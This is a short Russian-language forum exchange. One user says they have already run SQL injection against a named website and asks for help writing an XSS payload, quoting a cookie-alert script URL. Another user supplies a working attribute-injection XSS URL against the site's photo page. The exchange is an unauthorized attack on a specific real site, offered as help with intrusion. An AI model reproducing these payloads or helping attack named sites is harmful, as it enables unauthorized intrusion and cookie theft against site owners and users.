Решил полазить попытаться http://nepom.ru/forum/index.php?search=<script>alert(document.cookie)</script> Пытался строить разные запросы, но построить толком не смог. Синтаксис не правильный да и знаний высоких нету. Прошу вашей помощи спецы. SQL иньекция уже была сделана осталось XSS до кучи.. Спасибо!
Вот держи --- http://nepom.ru/photos/photos.php?photo=112994244510"%20STYLE="background-image:url(javascript:alert('XAXA'))"%20e=" --- Только я не понял зачем хсс если есть sql-inj? ЗЫ Знаний тут никаких не нужно! На нашем любимом сайте есть неплохой справочник, ещё есть такая штука - яндекс называется)
